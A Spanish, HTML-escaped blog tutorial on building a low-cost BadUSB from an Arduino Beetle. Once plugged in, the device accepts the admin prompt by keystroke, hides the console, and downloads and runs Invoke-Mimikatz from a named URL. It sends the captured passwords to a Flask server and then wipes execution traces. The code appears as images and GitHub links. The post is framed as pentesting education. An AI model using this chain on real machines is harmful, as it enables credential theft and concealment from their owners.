Preguntas muy acertadas, como sabéis Fare9 os quiere mucho y siempre piensa en vosotros, este cacharrito vendido por Hak5 cuesta la friolera de 45$, más gastos de envío (si no vives en USA), más aduanas (si no vives en EEUU).&lt;br /&gt;
Entonces no quiero que haya que dejarse el bolsillo en esto, y tras una charla en una &lt;i&gt;Hack and Beers&lt;/i&gt; vi unos arduinos leonardo de un tamaño muy reducido:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitLPttP5SotUqO1uJ_Wf19puNI8M3tCaG2_K-0QSmsMU2eXpOxbBlZq-8PZ5lUJpCZv2D-d__VvFa52ljLk1ATAEzavCjpvNCgFacUvpMSLAhlh1lpdKG8asrcDI2dqC818pJ6o_vWtUQ/s1600/0J3975.1200.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;952&quot; data-original-width=&quot;1200&quot; height=&quot;253&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitLPttP5SotUqO1uJ_Wf19puNI8M3tCaG2_K-0QSmsMU2eXpOxbBlZq-8PZ5lUJpCZv2D-d__VvFa52ljLk1ATAEzavCjpvNCgFacUvpMSLAhlh1lpdKG8asrcDI2dqC818pJ6o_vWtUQ/s320/0J3975.1200.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Véis como los USBs de toda la vida, chiquitito y transportable... EMMMM NO, esa no era la imagen (estúpido Fare9...), aquí lo tenéis:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiHjBzYacxJMGLeXS8-Su_oattiW8CdaiIb3JC1zHPKmWxaalRJIFWuxBCD2msAQz51kRx-ELxAY9opUwhuhGvahKpkALUrpKe_1HKrFFR2sMZRn6tHPNFCKnbw226Q88Fiui43nwGX-Y/s1600/badusb.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;800&quot; data-original-width=&quot;800&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiHjBzYacxJMGLeXS8-Su_oattiW8CdaiIb3JC1zHPKmWxaalRJIFWuxBCD2msAQz51kRx-ELxAY9opUwhuhGvahKpkALUrpKe_1HKrFFR2sMZRn6tHPNFCKnbw226Q88Fiui43nwGX-Y/s320/badusb.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Aha, esto ya parece otra cosa, y bueno aquí tenéis el mio:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF48wxIms1-19eGbDO7rbc2g9pRXVPKALtBilOGP5UAMz824DhAGE5TUFseS5Ft5vPMomFuJFVqDj5IUe19HdD2vB3jtK4shvJ3_CJbG4T6A3MxIA7MLVblNmD_dO_Fn2fyBpb8v9W1ds/s1600/photo_2017-09-12_19-26-36.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF48wxIms1-19eGbDO7rbc2g9pRXVPKALtBilOGP5UAMz824DhAGE5TUFseS5Ft5vPMomFuJFVqDj5IUe19HdD2vB3jtK4shvJ3_CJbG4T6A3MxIA7MLVblNmD_dO_Fn2fyBpb8v9W1ds/s320/photo_2017-09-12_19-26-36.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Esto, lo podéis comprar en el Aliexpress pues por unos 9€ con gastos de envío incluídos: &lt;a href=&quot;https://es.aliexpress.com/item/BadUsb-Beetle-Bad-USB-ATMEGA32U4-Development-Board-virtual-keyboard-For-Arduino/32799714294.html?spm=a2g0s.9042311.0.0.HCdWAX&quot; target=&quot;_blank&quot;&gt;BadUSB&lt;/a&gt;&lt;br /&gt;
Recibe el nombre de Badusb, pero como podéis ver su nombre científico es: &lt;i&gt;BadUsb Escarabajo Mala Junta de Desarrollo ATMEGA32U4 USB teclado virtual Para Arduino &lt;/i&gt;(traducción directa del chino mandarín)&lt;br /&gt;
Estos cacharros tienen igual un procesador ATMEGA el cual les permite funcionar como un teclado, gracias a una librería de arduíno conocida como &lt;i&gt;Keyboard&lt;/i&gt; (como vemos no se rompieron mucho la cabeza).&lt;br /&gt;
Además tenéis un IDE muy bonito, se puede descargar desde la página oficial de arduíno:&amp;nbsp;&lt;a href=&quot;https://www.arduino.cc/en/main/software&quot; target=&quot;_blank&quot;&gt;https://www.arduino.cc/en/main/software&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Bien, ahora vamos a explicar qué haremos así de &lt;i&gt;juaquin &lt;/i&gt;de ese que hacen los &lt;i&gt;juankers&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
Haremos que al insertar el usb, se habrá una CMD con permisos de administrador (¿¿¿quién usa en windows una cuenta que no tenga la posibilidad de esos permisos???), seguidamente, ejecutaremos una serie de comandos de Powershell, que permitirán la descarga de un código y su ejecución directa.&lt;br /&gt;
&lt;br /&gt;
El código a descargar será el siguiente: &lt;a href=&quot;https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1&quot; target=&quot;_blank&quot;&gt;https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1&lt;/a&gt; . Este código&amp;nbsp; pertenece al framework de pentesting y post explotación &lt;a href=&quot;https://github.com/PowerShellMafia/PowerSploit&quot; target=&quot;_blank&quot;&gt;Powersploit&lt;/a&gt;, y se encarga de inyectar directamente en la memoria de un proceso de ejecución, un programita conocido como &lt;a href=&quot;https://github.com/gentilkiwi/mimikatz&quot; target=&quot;_blank&quot;&gt;Mimikatz&lt;/a&gt;, este programa es capaz de obtener directamente desde la RAM las credenciales del usuario, por tanto, es un punto muy fuerte para aquellos que se dedicen al tema del pentesting.&lt;br /&gt;
&lt;br /&gt;
Tras obtener esos datos, se enviarán a un servidor que vamos a montar con python y una librería conocida como Flask.&lt;br /&gt;
&lt;br /&gt;
De momento vamos arrancando el IDE de arduino y veamos que es cada cosilla:&lt;br /&gt;
&lt;br /&gt;
################ ACTUALIZACIÓN&lt;br /&gt;
He subido al github una librería Keyboard modificada &lt;a href=&quot;https://github.com/Fare9/MR_Robot_mimikatz/tree/master/Keyboard&quot; target=&quot;_blank&quot;&gt;https://github.com/Fare9/MR_Robot_mimikatz/tree/master/Keyboard&lt;/a&gt;&lt;br /&gt;
Esta librería nos vale para&amp;nbsp; tener layouts de teclado de diferentes países, tenéis que descargar la carpeta Keyboard y reemplazar dentro de Arduino/libraries la actual librería Keyboard (siempre hacer backup por si acaso). Tras hacer esto, reiniciar el Arduino IDE.&lt;br /&gt;
Se ha modificado&amp;nbsp; también el código de MR_ROBOT (&lt;a href=&quot;https://github.com/Fare9/MR_Robot_mimikatz/blob/master/MR_ROBOT/MR_ROBOT.ino&quot; target=&quot;_blank&quot;&gt;https://github.com/Fare9/MR_Robot_mimikatz/blob/master/MR_ROBOT/MR_ROBOT.ino&lt;/a&gt;) pero no son grandes cambios, simplemente se ha añadido la utilidad para usar otro layout de teclado.&lt;br /&gt;
##################################&lt;br /&gt;
&lt;br /&gt;
1. Lo primero que vamos a ver es el código principal y luego iremos desmenuzando linea por linea y método por método:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFNkKbLXwOuJvOH06arvTp76c_rbCckRKWinM7Gfk2fv6ILn-AAaAncDovtIs6oy64f5G8TEXrZp51BByLnjAGoO4HlKpedcJjB9SVwUbOjGmLKQsf45rXSv8TegMq89WYkalyQivhGkk/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;504&quot; data-original-width=&quot;472&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFNkKbLXwOuJvOH06arvTp76c_rbCckRKWinM7Gfk2fv6ILn-AAaAncDovtIs6oy64f5G8TEXrZp51BByLnjAGoO4HlKpedcJjB9SVwUbOjGmLKQsf45rXSv8TegMq89WYkalyQivhGkk/s640/Captura.JPG&quot; width=&quot;598&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
En arduino, siempre tenemos dos métodos principales &lt;i&gt;setup &lt;/i&gt;y &lt;i&gt;loop&lt;/i&gt; , dentro del primero será donde daremos valor a las variables, o estableceremos los pines de arduíno (en este caso no es necesario esta parte), y lo que haremos aquí será inicializar la librería Keyboard para poder utilizarla.El segundo método es el que se ejecuta continuamente en un arduino normal, en este caso utilizamos una variable para evitar que sea un bucle, lo primero que realiza la función &lt;i&gt;loop&lt;/i&gt; es una espera de 2000, en arduino indicas esperas en milisegundos, por ejemplo, para esperar que se produzcan ciertos eventos, o que algunos eventos no se modifiquen durante un cierto tiempo. En este caso esperamos a que el ordenador reconozca el usb como un teclado. Después comprobamos si el código ya se ha ejecutado, y si no, pues ejecutamos una serie de funciones: &lt;i&gt;openCMDAsAdmin, whatsNewMimikatz y limpia&lt;/i&gt;. Finalmente establecemos ejecutado a 1 para que no se vuelva a ejecutar.&lt;br /&gt;
Vamos a ir viendo estas funciones:&lt;br /&gt;
2.&amp;nbsp; openCMDAsAdmin(), esta función se encarga de abrir la CMD de windows como administrador, además se encarga de ofuscarla para evitar que sea reconocible los comandos:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO485e3wcRGn8S2SUpJ-RzKcswoEcmAHKrmkB6wFcOTibzSCKiieNg9vjrvoNCglDfH6ad-qHA_a30X2_r9TMmGqMEuni7JaDnitJsv4pTNi7WP_4uePMOI9W8zkM0peOfd6iQU-3NBTA/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;405&quot; data-original-width=&quot;488&quot; height=&quot;530&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO485e3wcRGn8S2SUpJ-RzKcswoEcmAHKrmkB6wFcOTibzSCKiieNg9vjrvoNCglDfH6ad-qHA_a30X2_r9TMmGqMEuni7JaDnitJsv4pTNi7WP_4uePMOI9W8zkM0peOfd6iQU-3NBTA/s640/Captura.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Vamos a ver poquito a poquito qué dice aquí cada cosa, bien la primera línea, se encarga de apretar la tecla conocida como TECLA WINDOWS, y dejarla presionada, tras esto, pulsa la tecla &#39;R&#39;, y finalmente las libera las dos, esto abrirá una cajita como esta:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilFGBeW71y0ONdPIacB1uyvFLri_8wEfpNJDUBbWDiVQVzWsl1ryy1pl3dK_-kxu6dSM32Ezqh4kOEEmVqJzYfULPBn7hV0r4myJPVaLAR809kbzfLzUmEfIBN4LLwYa2axIocSNYLTzk/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;209&quot; data-original-width=&quot;405&quot; height=&quot;165&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilFGBeW71y0ONdPIacB1uyvFLri_8wEfpNJDUBbWDiVQVzWsl1ryy1pl3dK_-kxu6dSM32Ezqh4kOEEmVqJzYfULPBn7hV0r4myJPVaLAR809kbzfLzUmEfIBN4LLwYa2axIocSNYLTzk/s320/Captura.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
tras esto, se realiza una espera de medio segundo para dejar aparecer la caja, después utilizamos una función propia llamada &quot;printa&quot;, la cual se encarga de modificar el layout del teclado a EN en lugar de ES, ya que la librería de Keyboard utiliza un layout de teclado Americano, luego escribe lo que le hemos pasado como variable, y reestablece el layout:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLX98SMMOG3Gk2wRQBxsUpB-nlQXezUDiMSaNnAVXwfZYe8K1z3uS3eSWI7nsq9RzdUvgGXHUKVG95Cq2NZEkqT_XLYpLbhEO3MdJjdIrUq8esIHLthdnfEu7gySpJyuihHei27OO2jjE/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;175&quot; data-original-width=&quot;446&quot; height=&quot;250&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLX98SMMOG3Gk2wRQBxsUpB-nlQXezUDiMSaNnAVXwfZYe8K1z3uS3eSWI7nsq9RzdUvgGXHUKVG95Cq2NZEkqT_XLYpLbhEO3MdJjdIrUq8esIHLthdnfEu7gySpJyuihHei27OO2jjE/s640/Captura.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Tras apretar esto, nos pedirá la confirmación de abrir la consola como administrador:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtXwBgyMNrqJ-jW5azme2mDhfZ2NsAYPoRJcx7NvtWfU5vQmDKZJMDgxSh3GmlbnkQjbi3oyA963jw1QzIdWhpCGG8fT2_EMlAO-ExalXP4BHWghTgJSZ13Rvwjg2sAqMSurAVcua45Lw/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;379&quot; data-original-width=&quot;1071&quot; height=&quot;226&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtXwBgyMNrqJ-jW5azme2mDhfZ2NsAYPoRJcx7NvtWfU5vQmDKZJMDgxSh3GmlbnkQjbi3oyA963jw1QzIdWhpCGG8fT2_EMlAO-ExalXP4BHWghTgJSZ13Rvwjg2sAqMSurAVcua45Lw/s640/Captura.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Como vemos, no podemos coger el ratón y darle a &quot;Si&quot;, sino que usaremos el atajo de teclado ALT+S, que es lo que mostramos en la línea 7 y 8 de la función. Tras obtener una shell como administrador, ofuscamos utilizando la siguiente función:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj-Wq9QjK2TRspQtaSBS_SIOmuEpTddDaEE5RBegIo_6RoQJ6-E0ldAqHQYHjXmiX1K1CL9FFsBGyrEIhHB1j7DsxPWyyG0WwxQ_iPr_rjELqnLPirxBG2r7LR47yeA70QH5cPt5ik5-w/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;150&quot; data-original-width=&quot;464&quot; height=&quot;206&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj-Wq9QjK2TRspQtaSBS_SIOmuEpTddDaEE5RBegIo_6RoQJ6-E0ldAqHQYHjXmiX1K1CL9FFsBGyrEIhHB1j7DsxPWyyG0WwxQ_iPr_rjELqnLPirxBG2r7LR47yeA70QH5cPt5ik5-w/s640/Captura.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Esto dejará una SHELL como esta:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHERR6ikovzuWkpUhmqAJ9knZasb1XYS-1cASk5U_gI4A-pMEWbRtpkAjTW3jRnrCxmu44y8IA4q9vkRnoepPl-_ma6PqD7fDy-g3QcTXw1wETAPQvu_ci4u_c-acAx-16_jr9UiGaAGk/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;163&quot; data-original-width=&quot;350&quot; height=&quot;149&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHERR6ikovzuWkpUhmqAJ9knZasb1XYS-1cASk5U_gI4A-pMEWbRtpkAjTW3jRnrCxmu44y8IA4q9vkRnoepPl-_ma6PqD7fDy-g3QcTXw1wETAPQvu_ci4u_c-acAx-16_jr9UiGaAGk/s320/Captura.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Como vemos esta shell es más complicado ver que se está escribiendo, pero como a la shell le da igual, pues continuamos.&lt;br /&gt;
&lt;br /&gt;
3. whatsNewMimikatz(): esta función es la encargada de la descarga que antes hablamos, la ejecución y el envío de datos a un server:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEItAddjYJf6HDHTPmzSPaEFNjynwDjFTBLF5j_91Esvl7Yl7rFQzkcgirPQQN_0kpq0b3U7agonA3pOyGVC9TWsdLKA__US9kFQvQ_JJEk00r5RgyYD2ctHT69PjZw_vPOk57gpn0_ZU/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;156&quot; data-original-width=&quot;1236&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEItAddjYJf6HDHTPmzSPaEFNjynwDjFTBLF5j_91Esvl7Yl7rFQzkcgirPQQN_0kpq0b3U7agonA3pOyGVC9TWsdLKA__US9kFQvQ_JJEk00r5RgyYD2ctHT69PjZw_vPOk57gpn0_ZU/s1600/Captura.JPG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Esto de powershell, nos realiza la descarga y ejecución del Invoke-Mimikatz.ps1, tras esto se realiza la subida a un servidor el cual luego veremos el código. Como véis donde pone URL_SERVER, tenéis que poner la URL de vuestro servidor, no seais cazurros...&lt;br /&gt;
&lt;br /&gt;
4. limpia(), esta función es la encargada de limpiar un poco el rastro que hemos dejado en la máquina, lo que haremos será borrar el rastro de que hemos realizado la ejecución de cualquier programa:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCcK9gX78h_qQ2yEvPiPt9Aum7aEsFW6s67vcB3o_WH8PIRDXtQgsxVCouar4puJieidhN-vIqeTyvjts9dk46MrOsxTBoTioaUNPihP5CosOnCHauFyg8Tmr9NDrMR8AEyqFC_wGXQD0/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;142&quot; data-original-width=&quot;1315&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCcK9gX78h_qQ2yEvPiPt9Aum7aEsFW6s67vcB3o_WH8PIRDXtQgsxVCouar4puJieidhN-vIqeTyvjts9dk46MrOsxTBoTioaUNPihP5CosOnCHauFyg8Tmr9NDrMR8AEyqFC_wGXQD0/s1600/Captura.JPG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hasta aquí todo el código de Arduino, en imágenes (muajajajaja), pero tranquilos, como sé que también os mola el copy-paste más que el cesped a las vacas, en mi github tenéis el código completo: &lt;a href=&quot;https://github.com/Fare9/MR_Robot_mimikatz/blob/master/MR_ROBOT/MR_ROBOT.ino&quot; target=&quot;_blank&quot;&gt;https://github.com/Fare9/MR_Robot_mimikatz/blob/master/MR_ROBOT/MR_ROBOT.ino&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Ahora veremos el servidor que vamos a montar, este nos cabe entero en la fotito:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP6szzNFaZBBzgb5kJdGIuUSBB1FTG1_TKPggG_rFb-02iE6zTLQ0f_XniG7tfGRWicWrc7EwY6IkWZnzpUSJVpKuKx6ZYDMRpt3A4UdttUfIKcSSlo44CYNUXb10OdX8zOOsbNgKUVyw/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;382&quot; data-original-width=&quot;984&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP6szzNFaZBBzgb5kJdGIuUSBB1FTG1_TKPggG_rFb-02iE6zTLQ0f_XniG7tfGRWicWrc7EwY6IkWZnzpUSJVpKuKx6ZYDMRpt3A4UdttUfIKcSSlo44CYNUXb10OdX8zOOsbNgKUVyw/s1600/Captura.JPG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;Esto que podéis ver es un server completo, que responde a peticiones POST y GET en la ruta / (root) del servidor, en verdad la petición GET no vale para nada, pero así veis un poquito más, este servidor se encarga de procesar las peticiones que enviaría el powershell, para finalmente guardar lo enviado en un archivo.&amp;nbsp; (Código también en github)&lt;br /&gt;
La ejecución es sencilla, simplemente:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEN2hu1J7qDQPJWyYFCtv4Bak2FAIehIuH8_bW6Mpk7o5phLe1XsBMR_QGqthXPRtQejc2f5I1FCgCOQ8fLJaBe4IWAYecY9GpJtlqcer1ahw73wHD7w-0Bon3OKxJJoC5wYRKX8SuoCE/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;119&quot; data-original-width=&quot;667&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEN2hu1J7qDQPJWyYFCtv4Bak2FAIehIuH8_bW6Mpk7o5phLe1XsBMR_QGqthXPRtQejc2f5I1FCgCOQ8fLJaBe4IWAYecY9GpJtlqcer1ahw73wHD7w-0Bon3OKxJJoC5wYRKX8SuoCE/s1600/Captura.JPG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Vamos a poner en el script, la ip de la máquina kali, en mi caso la 10.0.2.10. Compilamos y metemos en el pincho, recordar una cosa en el arduino IDE:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYiW2aDorxcDCmVhog7hbDLWWFfY4hz8ygsf5EmSmU6I1zcD-7VcXqFp3TAQhJGy3D-34YENJKCMtjyKi2flIyBGRtaev6hBPlQ4bLDXVuMzaV7m0kOiGDv4CtIcC2D0zWIIBF0KWLbIA/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;460&quot; data-original-width=&quot;819&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYiW2aDorxcDCmVhog7hbDLWWFfY4hz8ygsf5EmSmU6I1zcD-7VcXqFp3TAQhJGy3D-34YENJKCMtjyKi2flIyBGRtaev6hBPlQ4bLDXVuMzaV7m0kOiGDv4CtIcC2D0zWIIBF0KWLbIA/s1600/Captura.JPG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
En Herramientas, establecer placa: &quot;Arduino Leonardo&quot; y en puerto aquel donde esté el arduino.&lt;br /&gt;
Vamos a ejecutar y ver que pasa en la máquina kali:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuHKEB9Gdu155JoFsKYQwEdwRC4lIQoNQFWpQF9vMt7NP_aEmiLREfLAdGXB8edI6PvnbborfMDYxn0jVoAJRDDiDZUNtO1HD1fWnzWpOkxe2AnLWJeADZm3yLCyL4c4iALi65L7Jf4eI/s1600/Captura.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;537&quot; data-original-width=&quot;820&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuHKEB9Gdu155JoFsKYQwEdwRC4lIQoNQFWpQF9vMt7NP_aEmiLREfLAdGXB8edI6PvnbborfMDYxn0jVoAJRDDiDZUNtO1HD1fWnzWpOkxe2AnLWJeADZm3yLCyL4c4iALi65L7Jf4eI/s1600/Captura.JPG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Como vemos, hemos obtenido ciertos datos por el método POST, y estos corresponden a los datos del PC y finalmente a la contraseña en claro y sus hashes, mimikatz ha conseguido obtener las contraseñas en claro y ejecutarse en pocos segundos sin mayor interacción que enchufar un pendrive en un PC.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCSsKCb4BcfcjbgKqaMQgAIcFXRDRSO6RaVqXlTvcgxPVA7GwFXVATOQD3MM7tOGftDq1YeKjJO8DoewOTQrC1vxpXB2uqV-6TkcNrEPqbpNLz26JBZ19BF3vxxoak5pRa9jSPGMPPHu0/s1600/impressive.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;255&quot; data-original-width=&quot;350&quot; height=&quot;233&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCSsKCb4BcfcjbgKqaMQgAIcFXRDRSO6RaVqXlTvcgxPVA7GwFXVATOQD3MM7tOGftDq1YeKjJO8DoewOTQrC1vxpXB2uqV-6TkcNrEPqbpNLz26JBZ19BF3vxxoak5pRa9jSPGMPPHu0/s320/impressive.gif&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4w1XPCRyakibtOoDiUZELjp7K5oqM9LN5mWDJQliVzxtGDcb5rPw1nAIOmV2vhRL70YyNJG9MWcFwnfbSqiStjpr5QUD9eWPNTClNF8ps7EHSC0PjWTY9GWd3Do7XyJMJ8If0w2ywzrM/s1600/impressive.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;524&quot; data-original-width=&quot;994&quot; height=&quot;168&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4w1XPCRyakibtOoDiUZELjp7K5oqM9LN5mWDJQliVzxtGDcb5rPw1nAIOmV2vhRL70YyNJG9MWcFwnfbSqiStjpr5QUD9eWPNTClNF8ps7EHSC0PjWTY9GWd3Do7XyJMJ8If0w2ywzrM/s320/impressive.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
